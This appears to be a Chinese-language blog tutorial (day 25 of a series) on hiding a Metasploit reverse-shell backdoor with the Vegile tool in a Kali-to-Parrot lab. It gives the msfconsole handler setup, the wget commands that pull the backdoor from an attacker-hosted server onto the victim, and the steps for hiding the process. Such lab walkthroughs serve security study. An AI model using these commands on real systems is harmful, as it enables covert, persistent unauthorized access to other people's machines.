【Day25】维持权限 — 隐藏後门(二)

哈罗～
昨天我们用msfvenom建立了一个後门，
将其传送到受害端的主机，
只要受害端运行了该程序，
就会建立TCP连线，并自动连回我们的主机。
我们便可以透过连线来控制目标。
另外，也透过git clone把Vegile下载到电脑。

今天就来接续昨天的实作吧～

环境：
Kali ─ 攻击方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)

攻击端准备

1. 将昨天的 後门 & Vegile 都移至/var/ww/html目录下。

    cp backdoor /var/www/html
    cp -r Vegile /var/www/html
   

   
   

   为了模拟从受害端连回去server下载工具，记得要启动apache。

   systemctl start apache2
   

   

2. 接下来我们执行msf控制台，使用exploit/multi/handler开始监听。

   msfconsole
   use exploit/multi/handler
   set payload linux/x64/shell/reverse_tcp
   set lhost [要连回的攻击者ip]
   set lport 777
   run
   

   

取得受害端权限後

3. 当我们已进入目标系统，可使用wget来下载我们step.1放到/var/www/html上的档案。

   wget [攻击者ip]/Vegile
   wget [攻击者ip]/backdoor
   

   
   
   
4. 之後执行Vegile --i backdoor时发现有错误...
   
   因为要隐藏的後门档案，需放置在Vegile目录下...
   於是我用cp直接复制过去...(๑¯∀¯๑)
   
5. 让我们再次确认Vegile & backdoor有在同个目录～
   
6. 使用chmod，将档案改为可执行档。

   chmod +x Vegile
   chmod +x backdoor
   

   
7. 透过Vegile来隐藏後门档案。

   ./Vegile --i backdoor
   

   
8. 回到我们攻击者的电脑，可以看到有来自受害端的连线，表示攻击成功。
   

小结

Vegile这个工具的指令其实很简单，
只有以下三个参数：

走罗！　高歌离席～